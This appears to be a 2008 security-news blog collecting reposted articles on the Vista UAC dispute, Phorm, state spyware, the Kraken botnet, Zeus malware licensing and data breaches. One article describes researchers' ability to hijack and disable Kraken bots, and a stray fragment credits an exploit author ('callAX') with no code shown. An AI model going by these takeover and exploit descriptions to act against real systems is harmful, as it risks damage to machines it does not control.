Wednesday, April 30, 2008
Software developers from NeoSmart, a not-for-profit technology-development organisation, claim they have successfully bypassed User Account Control, a security feature in Windows Vista.
The developers suggested on their website on Sunday that the feature was "only there to give the impression of security". Critics, however, have said that, by coding around User Account Control (UAC), the developers had simply done what Microsoft had intended them to do.
UAC is a controversial feature of Vista designed to stop users from installing or executing arbitrary code. Many see it as a hindrance to performing everyday tasks, as it requests confirmation for many actions where no user confirmation was needed in Vista's predecessor, XP. UAC does not request these confirmations from users with administrator privileges, but, in Vista, users do not by default have this status.
The NeoSmart developers are behind a tool, iReboot, that helps users choose which operating system they would like to reboot into. UAC had stopped the application from running at start-up, but the developers now claim to have bypassed UAC by splitting iReboot into two. One of the parts, running in the background, has privileged access to the operating system without requiring administrator approval each time the machine boots; the other part, running as a client program, interacts with this back-end service.
As the developers were able to grant the back-end part of the program privileges to run without express user approval every time the machine starts up, they claimed that Windows Vista's security limitations were "artificial at best, easy to code around, and only there to give the impression of security".
"Any program that UAC blocks from starting up 'for good security reasons' can be coded to work around these limitations with (relative) ease," wrote the developers in a blog post. "The 'architectural redesign' of Vista's security framework isn't so much a rebuilt system as much as it is a makeover, intended to give the false impression of a more secure operating system."
However, some individuals posting comments in reply to the blog post disagreed that UAC is an "artificial" security feature. "I feel your pain for having to split a simple program into two, but your ranting is way off the mark," wrote "steveg".
"You haven't coded around [UAC blocks]. Your users have granted your application administrator privileges during installation. Game over. All your base belong to us. Once you've acquired administrator rights, the machine is yours and UAC's role is done. If you had bypassed UAC without the user explicitly granting administrator rights, your rant would be completely justified; as it is, it's merely misinformed and wrong," steveg wrote.
Another poster, "Harry Johnston", said UAC had been expressly designed to force independent software developers to write code which would work in this way. "This is a perfect example of what UAC was actually invented for — to force developers to write software that works for people who aren't logged in as an administrator. Good thing too," he wrote.
These comments echoed earlier statements by Microsoft product unit manager David Cross, who said in a speech at the RSA Conference in San Francisco earlier this month that UAC was deliberately designed to "annoy users", in order to put pressure on third-party software makers to make their applications more secure.
Microsoft had not responded to a request for comment at the time of writing.
Awesome. Neosmart had to rewrite their application to work for non-admin users, which is exactly what Microsoft wanted third-party software vendors to do.....
Saying that you bypassed UAC, after being given administrator rights by the user behind the computer...is a pretty silly claim. Microsoft has stated in the past that UAC is not a hard security barrier - therefore it should be expected that applications that are purposely installed by the users could work with it.
BT are to develop an alternate method to record your opt-out status to Phorm as opposed to the default cookie based system that relies on your computer storing a cookie to indicate you are not a Phorm user. This follows TalkTalk's decision along the same path back in March and is good news for consumers as it will ensure the opt-in or opt-out status of your account is held more reliably, and is also possible to work across multiple computers on the same Internet connection.
Earlier this month the Information Commissioner Office (ICO) announced that ISPs using the Phorm system had to make it opt-in to comply with European law. This is definitely a step forward for the consumer, but ISPs TalkTalk and BT Retail had already pre-empted this to help ensue consumer confidence in the system.
There are, however, still concerns with regards the legality of the opt-in where computers are used by multiple people. Nicholas Bohm of the Foundation for Information Policy Research (FIPR) has indicated in his legal analysis of Phorm (PDF) that the EU law as referenced above by the ICO actually requires consent from the "data subject", which could be any user of the computer / connection, not just the person who ordered or pays the bills (paragraphs 55-58). In a letter to LINX he goes on to explain that ISPs will need to get consent from all users stating that one possible way to do this is to have the subscriber to the service promise that they are authorized to act on behalf of all users. This could well be a flawed approach as it is unlikely to be the case, particularly of unknown future users of the computer. With no easy way to actually identify the person using the computer, time will have to tell what approach is taken towards this by ISPs.
Eight months after the nation's chancellor accused China of information attacks, Germany now faces criticism over its intelligence agency's use of software designed to spy on other countries' officials.
The latest incident, which began in June 2006, involved Germany's intelligence agency -- the Bundesnachrichtendienst (BND) -- launching an information attack against the Ministry of Commerce and Industry of Afghanistan, ostensibly an ally, according to media reports. Using a Trojan horse, the intelligence agents were able to read an Afghan government official's e-mail, including his correspondence with a reporter working for the German news magazine Der Spiegel, and data stored on the compromised PC's hard drive. The German Constitution protects the secrecy of telecommunications, but BND's legal counsel concluded that, because the messages were stored communications, they did not fall under the constitutional protection, Der Spiegel reported.
The operation ended on November 2006, when a whistleblower sent a letter to his superiors warning of the surveillance, the magazine reported. In February 2008, an anonymous BND employee notified two members of Germany's parliament of the intelligence agency's wiretapping activities. The incident only recently came to light during a Parliament hearing two weeks ago.
German's Interior Minister Wolfgang Schaeuble raised the specter of terrorism during a TV interview to defend the cyber-espionage tactics as necessary. "It's about a few isolated cases," he said, according to an Associated Press report.
The revelations that German intelligence stole information from another country using malicious code is the latest incident of national spying. In November, Germany accused Chinese intelligence officials of spying on its government computer systems. In the United States, the government agency responsible for spying on other countries -- and defending American communications against eavesdropping -- remains accused of wiretapping communications between U.S. citizens and foreign terrorism suspects. And this week, four private investigators in Israel were sentenced to prison for their role in using Trojan horse programs to spy on clients' rivals.
In a previous controversial incident in Germany, BND agents used a Trojan horse to compromise computers of the Democratic Republic of the Congo, aiming to gather information to help German peacekeepers stationed in the troubled nation.
Der Spiegel is considering filing a lawsuit against the intelligence agency, the magazine stated in its coverage of the incident.
A village in England will host a robot hide-and-seek exercise next month, when 11 teams drawn from private companies and universities compete to sniff out snipers, roadside bombs, and other hidden dangers while relaying real-time images to a command post.
The MOD Grand Challenge, as it's called, is billed as the U.K. Ministry of Defense's counterpart to the U.S. DARPA Challenges, except it's military robots that compete against one another instead of robotic cars.
The purpose is to boost development of small robot teams capable of scouting out and alerting troops to potentially dangerous surprises on the urban battlefield. The robots must autonomously negotiate complex, unfamiliar terrain and urban clutter to locate the threats. Points are earned based on the number of threats uncovered in one hour. Points are lost if a team resorts to remote control to maneuver its bots at any stage.
One team, Stellar Consortium, will employ two unmanned aerial vehicles equipped with thermal, visual, and radar sensors to provide surveillance of the village. The data will then be used to direct a small robot on the ground.
The Swarm Systems team will field eight battery-powered, GPS-guided, Frisbee-sized, propeller-driven micro air vehicles (MAVs) called "Owls." These airborne bots hover and dart like birds while communicating with one other and a base station using Wi-Fi.
The highest-scoring team gets a shot at a lucrative MOD contract and a chance to see its system put to work in Afghanistan or southern Iraq.
China is constructing a major underground nuclear submarine base near Sanya, on Hainan Island off its southern coast, Jane's can confirm. Although Asian military sources have disclosed this fact to Jane's since 2002, high-resolution commercially available satellite imagery from DigitalGlobe allows independent verification of the previous suggestions.
The extent of construction indicates the Sanya base (also known as Yulin) could become a key future base for People's Liberation Army Navy (PLAN) aircraft carriers and other power-projection ships. In December 2007, perhaps in concert with a major PLAN exercise the previous month, the PLA moved its first Type 094 second-generation nuclear ballistic missile submarine (SSBN) to Sanya.
An underground submarine base and the positioning of China's most advanced sub-surface combatants at Sanya would have implications for China's control of the South China Sea and the strategically vital straits in the area. Further satellite imagery suggests the construction of Sanya has been supported by a gradual military build-up in the Paracel Islands over the last 20 years, and the transformation of the Chinese-occupied features in the Spratly Island group into assets that could support a range of military operations.
China's nuclear and naval build-up at Sanya underlines Beijing's desire to assert tighter control over this region. China's increasing dependence on imported petroleum and mineral resources has contributed to an intensified Chinese concern about defending its access to vital sea lanes, particularly to its south. It is this concern that in large part is driving China's development of power-projection naval forces such as aircraft carriers and long-range nuclear submarines.
China has pursued this build-up at Sanya with little fanfare, offering no public explanations regarding its plan to base nuclear weapons or advanced naval platforms there.
For both regional and extra-regional powers, it will be difficult to ignore that China is now building a major naval base at Sanya and may be preparing to house and protect a large proportion of its nuclear forces here, and even operate them from this base. This development so close to the Southeast Asian sea lanes so vital to the economies of Asia can only cause concern far beyond these straits.
After quietly taking an equity stake in two-year-old startup flash memory manufacturer Spansion, IBM now plans to augment its own still emerging, futuristic "racetrack" memory with flash memory dubbed MirrorBit.
IBM envisions its highly non-volatile, endlessly rewritable racetrack memory (RM) technology as capable of storing 3,500 movies on a single handheld MP3 player within the next decade. Now, under a cross-licensing deal officially announced today, IBM will work with the world's #1 producer of NOR flash memory, Spansion, to produce RM.
Together, the two will co-develop RM, a magnetic medium with no moving parts, and MirrorBit, a "charge trapping" technology designed to increase the density of a flash memory array while keeping costs down on manufacturing.
As a particular target, the two companies are honing in on China, where Spansion employs more than 1,300 people at design centers in Beijing and Suzhou, a manufacturing plant in Suzhou, and three sales and marketing offices.
Already in use by the top ten automotive OEMs, MirrorBit is also utilized in embedded systems ranging from gaming machines and wireless devices to telecom networking equipment.
It was 1943, and an engineer with Bell Telephone was working on one of the U.S. government's most sensitive and important pieces of wartime machinery, a Bell Telephone model 131-B2. It was a top secret encrypted teletype terminal used by the Army and Navy to transmit wartime communications that could defy German and Japanese cryptanalysis.
Then he noticed something odd.
Far across the lab, a freestanding oscilloscope had developed a habit of spiking every time the teletype encrypted a letter. Upon closer inspection, the spikes could actually be translated into the plain message the machine was processing. Though he likely didn't know it at the time, the engineer had just discovered that all information processing machines send their secrets into the electromagnetic ether.
Call it a TEMPEST in a teletype.
This story of how the United States first learned about the fundamental security vulnerability called "compromising emanations" is revealed for the first time in a newly-declassified 1972 paper TEMPEST: A Signal Problem (.pdf), from the National Security Agency's secret in-house journal Cryptologic Spectrum.
"There has always been speculation about TEMPEST coming out of the Cold War period," says Joel McNamara, author of Secrets of Computer Espionage: Tactics and Countermeasures, who maintained for years the best compilation of public information on TEMPEST. "But the 1943 Bell Labs discovery is roughly ten years earlier than I would have expected."
The unnamed Bell Telephone technician was the Alexander Graham Bell of a new, secret science, in which electronic eavesdroppers -- as far away as hundreds of feet from their target tune into radio waves leaking from electronic equipment to steal secrets.
Building on the breakthrough, the U.S. developed and refined the science in an attempt to spy on the Soviets during the Cold War. And it issued strict standards for shielding sensitive buildings and equipment. Those rules are now known to government agencies and defense contractors as TEMPEST, and they apply to everything from computer monitors to encrypted cell phones that handle classified information.
Until now, little has been known about when and how the U.S. government began trying to protect itself from this threat, and the NSA paper tells the story well.
Tuesday, April 29, 2008
Of course, this friend knew of my background in the coffee industry and was nice enough to offer it to me, so I added it to my coffee cup collection. Well, it is less of a collection and more like a spot in my kitchen cabinet which contains a large number of coffee cups...but I digress.
According to my friend, it was acquired at the CIA gift shop in the late 90s (yea, they have/had a gift shop).
Anyways, here it is.
But guess what I found on the bottom??
Earlier this month a number of articles surfaced on the research and disagreements with regards to the size and classification of a large bot net named Kraken. At the front line of the debate was SecureWorks and Damballa. Secureworks claims Kraken is actually Bobax and estimates the bot net to include over 185,000 compromised systems. Damballa disagrees stating that Kraken is an entirely new bot net with a size over twice as large as Storm. Semantics aside no one disagrees that Kraken/Bobax is among the largest of the known bot nets if not the largest.
Cody and I thought it would be interesting to examine Kraken with the specific goal of infiltrating the bot network. We started with a sample from Offensive Computing and working from there eventually concluded that we would indeed be able to infiltrate and take over increasingly larger portions of the Kraken bot net. Cody did most of the manual labor of protocol dissection, reverse engineering the encryption routines and eventually creating a fake Kraken server capable of overtaking a redirected zombie. His detailed write up on the reverse engineering process is available under "Owning Kraken".
Various estimates place the overall size of the botnet to be somewhere between 185,000 and 600,000 zombies. This means that within a single week we would have been able to take over anywhere from 4% to 14% of the infected population ... and this is where we entered into a moral dilemma and ethical discussion. We have the ability to successfully redirect infected systems. We have the ability to provide an 'update' through the existing Kraken protocol that can simply remove the Kraken zombie (again see "Owning Kraken" for a video demonstrating this capability). Is it wrong to do so? Although this discussion is similar to that of writing "good worms" that roam the internet patching vulnerable servers, there is a key difference in that a good worm can't be stopped. Once it has been released it is a self spreading uncontrollable entity. In our specific case however we have the ability to cease at any point. It is simply a one to one relationship. An infected system connects to us, we supply a simple binary to kill the target process, we never hear from the infected system again and neither can the actual botnet owners command and control servers.
Cody and I both are pro "cleansing". Dave Endler on the other hand is against. The arguments for pro-cleansing are obvious, the arguments against are a little more complicated. The most interesting of points that Dave brought up is the corner case of what happens if we accidentally crash the target system? What if that target system is responsible for someone's life support? Yes the system is already infected with a SPAM delivering zombie capable of receiving arbitrary updates from malicious actors, but at least for now it's running and carrying out the rest of it's functionality. As director of DVLabs, Dave's opinion overshadows that of our own so we simply sit and monitor. What are your personal thoughts on the matter?
The Tipping Point team brings up an interesting question.
Taking down the majority of the Kraken botnet with a rogue delete/shutdown command is a very "technically sweet" solution. However, it could have very serious consequences.
First, we don't know exactly what all of these computers are doing. As Dave pointed out, one could be controlling a life support system in a hospital. Another could be controlling some SCADA system. Another could be a server at a bank or another major corporation.
What if the command doesn't work perfectly on all the bots? Whats if the computer running the bot is already in an unstable condition due to massive infection? Will the computer crash or just reboot?
If the "cleansing" turns out to do physical damage in the real world, who will be responsible? Tipping point? The people that issued the command? Or the owner of the infected computer? Who knows.
From the standpoint of Tipping point, the idea of attempting to clean the bots sounds good but brings with it too much risk....risk that the corporation doesn't need.
It reminds me of the police pursuit question. Should police chase after a criminal if it will place innocent citizens in greater danger?
Its a grey-area for sure, but I think most people rather err on the side of caution...and not chase the everyday criminal if it will endanger the public.
University of Miami officials last week acknowledged that six backup tapes from its medical school that contained more than 2 million medical records was stolen in March from a van that was transporting the data to an off-site facility.
Jacqueline Menendez, vice president of communications at the university, said a vehicle used by Archive America Ltd. to transport the patient data was broken into in downtown Coral Gables, Fla., on March 17. Thieves removed a transport case carrying the school's computer backup tapes, she said.
For reasons Menendez could not explain, Archive America waited 48 hours before finally notifying the university on Mar. 19 about the break-in and theft. Officials from the transport firm couldn't be reached.
The university posted an alert about the incident on April 17, a full month after the backup tapes were stolen. In a statement, Doctor Pascal J. Goldschmidt, senior vice president for medical affairs and dean of the University of Miami Miller School of Medicine, said, "Even though I am confident that our patients' data is safe, we felt that in the best interest of the physician-patient relationship we should be transparent in this matter."
Since the incident, Mendendez said that the university temporarily stopped transporting backup data off-site. "At this point, we're not transporting anything until we conduct our own internal evaluation of the incident and see if there's anything that could have been done differently or better," she said.
Coral Gables law enforcement officials, who are investigating the incident, have informed the school that it was likely a "random theft," Mendendez noted.
The stolen backup tapes hold names, addresses, Social Security numbers and health information all patients at university medical facilities since Jan. 1, 1999. Financial data from approximately 47,000 people may be on the missing tapes, said Mendendez. Each potential victim has been contacted by the school, she said.
PRAGUE, Czech Republic (AP) - Several Web sites of the U.S.-funded Radio Free Europe/Radio Liberty have been attacked, the broadcaster said Monday, suggesting the Belarus government could be responsible.
In the form of a denial-of-service attack that floods servers with fake traffic so legitimate visitors cannot get through, the assault began Saturday and continues, the network said in a statement.
The broadcaster said it is trying to restore its Web sites.
The attack is aimed mainly the site of Radio Free Europe's Belarus service, but Web sites serving Iran, Russia, Azerbaijan, Tajikistan, Kosovo, Macedonia, Bosnia and Croatia also have been affected, the network said.
Jeffrey Gedmin, the network's president, compared the attack to communist countries jamming U.S.-backed broadcasts during the Cold War.
"Dictators are still trying to prevent the kind of unfiltered news and information that (Radio Free Europe) provides from reaching their people," Gedmin said. "They did not succeed in the last century and they will not succeed now."
Radio Free Europe/Radio Liberty is a private, nonprofit corporation that receives funding from the U.S. government. It was established in 1949 to spread pro-Western news and promote democratic values and institutions in countries behind the Iron Curtain.
The head of the radio's Belarus service, Alexander Lukashuk, said the attack began on the 22nd anniversary of the Chernobyl nuclear catastrophe in neighboring Ukraine. He said a similar attack took place the same day one year ago but lasted only hours and did not hit services in other languages.
"We have a large Internet audience (in Belarus) that was relying on us to report live a rally of thousands of people protesting the plight of uncompensated Chernobyl victims and a government decision to build a new nuclear power station," he said.
The broadcaster suggested the government of authoritarian Belarus President Alexander Lukashenko could be behind the attack.
"It's very hard to be certain in these cases but because the target was the Belarus service it does look like it's coming from the Belarus government," said Diane Zeleny, spokeswoman for the broadcaster.
"For our listeners in Belarus, it's quite dramatic," Zeleny said. "They cannot reach us right now. This is a pretty massive attack."
"There was no immediate response from the Belarussian government."
A new contest focused on testing antivirus and malware software has been announced for the DefCon hacker conference in August. Antivirus vendors are crying foul, but they could very well be ignoring one of the best opportunities to improve their own products.
Called "The Race to Zero," this sideline contest provides hackers with samples of virus and malware code. The challenge is to modify the code in such a way that it can successfully circumvent antivirus products running at a central portal at the conference.
The Race to Zero web site explains that the goal is not to crowdsource new viruses, saying, "Not all antivirus is equal, some products are far easier to circumvent than others. Poorly performing antivirus vendors should be called out." The site also states that modified samples will not be released into the wild and that a key element of the contest's big picture is that "you need to look at controlling your endpoint devices with patching, firewalling and sound security policies to remain virus free."
Race to Zero will award the overall winning team or individual for successful code that passes through the AV products in each round. In addition, other awards will be given for things like "most elegant obfuscation," "dirtiest hack of an obfuscation," "comedy value," and "most deserving of beer." Details have not been released as to what each of these awards will be (though beer appears to be involved).
Obviously, virus and malware authors don't need a conference to collaborate on attacking AV products, but that isn't stopping the vendors from slamming Race to Zero. "[The contest] will do more harm than good," TrendMicro's Paul Ferguson told Network World. "Responsible disclosure is one thing, but now actually encouraging people to do this as a contest is a little over the top."
Roger Thompson, chief research officer at AVG Technologies, says vendors are already processing 30,000 code samples each day. "It's hard to see an upside for encouraging people to write more viruses."
On the other side of this coin, however, is a mountain of criticism against AV vendors that their products are falling behind in the use of emerging techniques and technologies. As malware organizations adopt Software as a Service business models, statements on the Race to Zero web site that "signature-based antivirus is dead" and "people need to look to heuristic, statistical and behaviour-based techniques to identify emerging threats" echo a growing dissatisfaction with the AV industry.
Instead of trying to deride Race to Zero, the AV industry could have a chance at working with the contest to harness what, in reality, could turn out to be some of the best research available on new malicious techniques. "You get what you pay for," as the old saying goes, but in the case of Race to Zero, the AV industry could be passing up a veritable gold mine of free ideas on how to better fight new threats.
Fergie is a long time friend and I hold him in great respect, but personally I feel that people need to be shown what AV really is....just another tool.
Tons of people still think that running AV is grand protection from everything, but this just isn't true. AV protects solid protection from known threats, but new emerging threats from a targeted attack are rarely stopped. The information is out there...for all to see.
Like it not, but showing people the truth is the essence of Defcon.
Do you think lock makers love the lockpick village? Of course not.
Should we not highlight the flaws in those silly RFID chips that the government wants to stick in everything? Of course we should.
Locks and RFID cards offer a layer of protection as well.
But in the end, they are just another tool.
Can mental training improve your intelligence? No video game or mental puzzle has convincingly been shown to work. But now a group of neuropsychologists claims it has found a task that can add points to a person's IQ – and the harder you train, they say, the more you gain.
So-called "fluid intelligence", or Gf, is the ability to reason, solve new problems and think in the abstract. It correlates with professional and educational success and it appears to be largely genetic.
Past attempts to boost Gf have suggested that, although by training you can achieve great gains on the specific training task itself, those gains don't transfer to other tasks.
Now Susanne Jaeggi at the University of Michigan at Ann Arbor, US, and her colleagues say that is not true.
They invited 70 healthy adults to participate in a challenging training exercise known as the "dual n-back" task.
The first part of the exercise involves small squares on a screen that pop into a new location every three seconds. Volunteers have to press a button when the current location is a duplicate of two views earlier.
For the second part, the volunteers have to simultaneously carry out the same task with letters. Consonants are played through headphones and they have to press a button when they hear one that is the same as that heard two "plays" earlier.
If participants perform well, the interval to be tracked (n) increases to three or more stages earlier.
Jaeggi's volunteers were trained daily for about 20 minutes for either 8, 12, 17 or 19 days (with weekends off). They were given IQ tests both before and after the training.
The researchers found that the IQ of trained individuals increased significantly more than controls – and that the more training people got, the higher the score.
It can't rival Spider-Man yet, but a new micromachine that works like a spider's silk duct might finally lead the way to producing industrial quantities of high-quality artificial spider silk.
Now German researchers have demonstrated a new method of production – an artificial version of the ducts spiders use to "spin" the silk.
Spiders' silk ducts contain glands that process a gel of simple proteins into long fibres of protein. Different glands alter the chemistry of the gel in different ways, producing silk with different properties.
The artificial duct is a glass chip shot through with tiny tubes that tries to mimic those processes.
"The best thing is to reproduce nature, instead of cutting open spiders," says Andreas Bausch of the Technical University of Munich in Germany, who led the research with Thomas Scheibel of the University of Bayreuth, also Germany.
Bausch and Scheibel are the first to create a device that so accurately recreates the chemical and physical conditions of a real silk duct.
They are also the first to make fibres containing more than one silk protein. The chip uses two – known as ADF3 and ADF4 – found in silk from the European garden spider (Araneus diadematus).
Monday, April 28, 2008
The call girl linked to the downfall of former New York Gov. Eliot Spitzer sued the founder of the "Girls Gone Wild" series on Monday for $10 million, claiming he exploited her image and name to advertise the racy videos.
Ashley Alexandra Dupre, 22, contended in the lawsuit that she was only 17 — too young to sign legally binding contracts — and drunk on spring break in 2003 when she agreed to be filmed for "Girls Gone Wild" in Miami Beach.
Dupre "did not understand the magnitude of her actions, nor that her image and likeness would be displayed in videos and DVDs," says the lawsuit filed by Miami attorney Richard C. Wolfe.
The lawsuit filed in federal court in Miami names as defendants "Girls Gone Wild" founder Joe Francis, two of his companies and a man purportedly involved in creation of two Internet sites that the lawsuit contends improperly use Dupre's image to sell DVDs and other products.
Francis, 35, has built a soft porn empire filming and marketing videos of young women exposing their breasts and being shown in other sexually provocative situations, often at public events such as Mardi Gras or spring break beach locales.
Dupre gained notoriety in March when it came out that she was the high-priced call girl named "Kristen" named in court documents who was hired by Spitzer for at least one tryst at a posh Washington hotel. Spitzer, known as "Client 9" in the documents, resigned as New York governor a few days after the scandal broke.
Francis made a public $1 million offer for Dupre to appear in a "Girls Gone Wild" video and go on a promotional tour, then rescinded the offer after he realized he already had footage of Dupre from 2003. Dupre's lawyer warned she was only 17 when the video was shot, not 18 as Francis claimed.
Francis said in March that Dupre spent a week on a "Girls Gone Wild" bus and made seven full-length tapes after signing release papers. He also said he bought her a bus ticket home to North Carolina.
Francis said he was surprised by the lawsuit.
"It is incomprehensible that Ms. Dupre could claim she did not give her consent to be filmed by Girls Gone Wild, when in fact we have videotape of her giving consent, while showing her identification," Francis said in a statement.
What a silly story...
Airline passengers are to be screened with facial recognition technology rather than checks by passport officers, in an attempt to improve security and ease congestion, the Guardian can reveal.
From summer, unmanned clearance gates will be phased in to scan passengers' faces and match the image to the record on the computer chip in their biometric passports.
Border security officials believe the machines can do a better job than humans of screening passports and preventing identity fraud. The pilot project will be open to UK and EU citizens holding new biometric passports.
But there is concern that passengers will react badly to being rejected by an automated gate. To ensure no one on a police watch list is incorrectly let through, the technology will err on the side of caution and is likely to generate a small number of "false negatives" - innocent passengers rejected because the machines cannot match their appearance to the records.
They may be redirected into conventional passport queues, or officers may be authorised to override automatic gates following additional checks.
Ministers are eager to set up trials in time for the summer holiday rush, but have yet to decide how many airports will take part. If successful, the technology will be extended to all UK airports.
The automated clearance gates introduce the new technology to the UK mass market for the first time and may transform the public's experience of airports.
Existing biometric, fast-track travel schemes - iris and miSense - operate at several UK airports, but are aimed at business travellers who enroll in advance.
The rejection rate in trials of iris recognition, by means of the unique images of each traveller's eye, is 3% to 5%, although some were passengers who were not enrolled but jumped into the queue.
They should do this in the states....if it removes the need for me to take off my shoes.
Gezz, that is a stupid rule.
Malware authors have lifted a page from the legit software industry's rule book and are slapping copyright notices on their Trojans.
One Russian-based outfit has claimed violations of its "licensing agreement" by its underworld customers will result in samples of the knock-off code being sent to anti-virus firms.
The sanction was spotted in the help files of a malware package called Zeus, detected by security firm Symantec as "Infostealer Banker-C". Zeus is offered for sale on the digital underground, and its creators want to protect their revenue stream by making the creation of knock-offs less lucrative.
The copyright notice, a reflection of a lack of trust between virus creators and their customers, is designed to prevent the malware from being freely distributed after its initial purchase. Virus writers are essentially relying on security firms to help them get around the problem that miscreants who buy their code to steal online banking credentials have few scruples about ripping it off and selling it on.
In a blog posting, Symantec security researchers have posted screen shots illustrating the "licensing agreement" for Infostealer Banker-C.
The terms of this licensing agreement demands clients promise not to distribute the code to others, and pay a fee for any update to the product that doesn't involve a bug fix. Reverse engineering of the malware code is also verboten.
"These are typical restrictions that could be applied to any software product, legitimate or not," writes Symantec researcher Liam O'Murchu, adding that the most noteworthy section deals with sanctions for producing knock-off code (translation below).
In cases of violations of the agreement and being detected, the client loses any technical support. Moreover, the binary code of your bot will be immediately sent to antivirus companies.Despite the warning copies of the malware were traded freely on the digital underground days after its release, Symantec reports. "It just goes to show you just can’t trust anyone in the underground these days," O'Murchu notes.
Wow. This means that malware authors are threating to report their own creation to AV companies, if the client attempts to screw the malware author (they don't care if you steal bank records with it). It is like some type of written DRM for malware.
This should also show the world how confident malware authors are about evading AV detection. They are willing to send in their own program...just to screw their client - since they can easily modify it to evade detection again right afterwards.
Hackers have managed to shut down the Bank of Israel for two whole days, taking advantage of the Jewish festival of Passover, when senior staff members were out of the office.
According to Israeli newspaper Globes, who were first to alert the bank to the fact that they’d been attacked, hackers managed to scrawl "Hear me Jews, you're a nation whose fate is sealed and sooner or later you will lose in war."
The Bank of Israel was quick to close the site until it could get a handle on who exactly was behind the attack, and what damage they had done. The Bank also said that it was 'temporarily closed', but that might just be because its lazy, and patently hopeless security staff wanted to stretch the long weekend out a bit further.
Globes reported that the text went on to say "Victory will come, inshallah (God willing) and the scenario of Chechnya will be repeated and we will drive you out. Millions of young Muslims are willing to die for al-Quds (Jerusalem), which belongs to us."
Globes was apparently told by its sources in the bank that financial reports going as far up as October 2007 had been deleted from the bank’s systems, but Bank of Israel spokesman, Yossi Saadon, said that the problem was 'being dealt with' and that the 'incident has no effect on the bank's internal systems'.
He added that all transactions were protected in such a way that there was no conceivable way that anyone could have hacked into the actual data systems from the Internet. He hopes.
Algeria is the top susupect but not the only one. Some Israelis think that Hizbullah is much more likely to be behind the attack, or Qatar, or even Palestinians from Gaza. But seeing as most of these groups tend to blow things up as a way of expressing themselves, the bank hack seems a tad too articulate.
The bank will be open for business again once the remaining questions about the embarrassing hack have been answered. Or just as soon as the bank’s employees can be bothered to drag themselves back to the office. Probably the latter.
Leading security software vendor, PC Tools revealed that it has identified a new variant of the Kraken bot, also known as Bobax, and has disclosed the source code of its key component. The new variant employs new techniques to evade detection which makes this latest Kraken bot a significant threat.
“PC Tools are revealing the details of the latest Kraken variant including the new list of domain names as well as the mathematical algorithm used. The source code of the Kraken domain name generation algorithm is disclosed in the interests of congregating all the knowledge about this bot so that other security specialists can benefit from it,” said Sergei Shevchenko, Senior Malware Researcher, PC Tools. “The more collective knowledge security vendors have over this threat, the greater the chance the industry has of defeating it,” said Shevchenko.
by callAX -> Fr33d0m & Kn0wl3dg3 1s th3 r341 P0w3r
If a user visits the malicious page the attacker can execute code.
Coded by callAX
According to Secunia, HP has addressed the vulnerabilities in 4.000.010.008 (see HP advisory for details).
Friday, April 25, 2008
The Anti-Spyware Coalition has launched a review of Phorm, NebuAd, and other behavioral targeting firms that track user data from inside the world's ISPs.
Today, the ASC - a collection of anti-spyware companies, academics, and various consumer advocates - announced a new internal working group to decide how Phorm and the Phormettes will affect the organization's overarching policies on spyware.
These policies serve as guidelines for the leading anti-spyware apps. "We update our documents when a new potential threats and new potentially-unwanted technologies emerge," says Ari Schwartz, the vice president and chief operating officer at the Center for Democracy and Technology, which first organized the ASC. "Some [anti-spyware companies] have said that behavioral advertising is a gray area when it comes to the ASC definitions. And if some people think this a gray area, it's something we need to look at."
Through partnerships with ISPs on both sides of the Atlantic, companies such as Phorm, NebuAd, and Front Porch track search and browsing activity in an effort to target online ads. Phorm and NebuAd serve up ads on their own, while Front Porch licenses its data to third-party ad networks.
In some cases, anti-spyware tools already flag the ad-server cookies laid down by the likes of Phorm and NebuAd - as well as cookies used by Front Porch partners. The big question is how the cookies should be flagged.
"We need to go into detail on how the consent factors work here. Does someone clearly know they're being tracked or not?" Schwartz says. "We must determine what level of risk is tied to these things."
All three of these behavioral ad firms insist the data they collect includes no personally identifiable information. But it's unclear whether users are properly notified before these services are turned on.
NebuAd says that ISP partners are required to "directly notify" users via letter or email, but this hasn't always happened in the past. In some cases, Front Porch notifies users with a conspicuous in-browser message. But in other cases, it does not.
Phorm hasn't officially rolled out its service, but it has agreements with BT, Carphone Warehouse, and Virgin in the UK (though Virgin insists this does not mean it will actually use the service). Carphone has said it will ask for user consent before turning Phorm on, but the others have not. In 2006 and 2007, Phorm conducted trials on BT's network without telling customers diddly.
Other operations that appear to be working on similar services include a Bay Area company called Adzilla; and Project Rialto, a "stealth company" created by Alcatel-Lucent, but these firms have not responded to our interview requests.
BEIJING — China appeared to bend to international pressure on Friday as the government announced it would meet with envoys of the Dalai Lama, an unexpected shift that comes as violent Tibetan demonstrations in western China have threatened to cast a pall over the Beijing Olympics in August.
China’s announcement, made through the country’s official news agency, provided few details about the shape or substance of the talks but said the new discussions would commence “in the coming days.” The breakthrough comes as Chinese officials have pivoted this week and moved to tamp down the domestic nationalist anger unleashed by the Tibetan crisis and by the protests at the international Olympic torch relay.
“In view of the requests repeatedly made by the Dalai side for resuming talks, the relevant department of the central government will have contact and consultation with Dalai’s private representative in the coming days,” said an unidentified Chinese official, according to Xinhua, the official news agency.
The Dalai Lama, the exiled Tibetan spiritual leader, was returning to India from the United States on Friday. He has repeatedly called for renewed talks with Chinese officials and last month sent a letter to China’s president, Hu Jintao. Earlier this month, he hinted in Seattle that a back-channel discussion was already under way. On Friday, his spokesman, Tenzin Taklha, said: “Since His Holiness is committed to dialogue, we would welcome this.”
The spokesman added that the Dalai Lama had not yet received any official communication from China. “We also have to look at when the offer does officially arrive,” he said from Dharamshala, India, the seat of the Tibetan government-in-exile. “We have to look at conditions they are talking about.”
The UN's nuclear watchdog has said it will investigate US claims that Syria was building a secret nuclear reactor with North Korean help.
The International Atomic Energy Agency criticised the US for withholding its intelligence until seven months after Israel bombed the site.
The US said the alleged Syrian reactor "was not for peaceful purposes".
Syria has said the US claim is "ridiculous" and has denied any nuclear links to North Korea.
The site of the alleged reactor, said to be like one in North Korea, was bombed by Israel in 2007.
The director general of the UN's International Atomic Energy Agency (IAEA), Mohamed ElBaradei, has now been briefed by the US on their claims but "deplores" the delay, a statement from the agency said.
"The agency will treat this information with the seriousness it deserves and will investigate the veracity of the information," the statement said.
The agency was critical of both the US delay in releasing the information and of Israel's bombing of the site before the IAEA could inspect it.
"The director general views the unilateral use of force by Israel as undermining the due process of verification that is at the heart of the non-proliferation regime," the statement said.
The statement is a clear indication that Mr ElBaradei is not accepting the US claims at face value and wants his own first-hand information, says BBC diplomatic correspondent Bridget Kendall.
Syrian officials have said the site that was bombed by Israel on 6 September 2007 was an unused military facility under construction. Building on the site had stopped some time before the air strike, the Syrians said.
On Thursday, American security officials showed members of Congress evidence they said proved Syria was building a nuclear reactor with North Korean assistance.
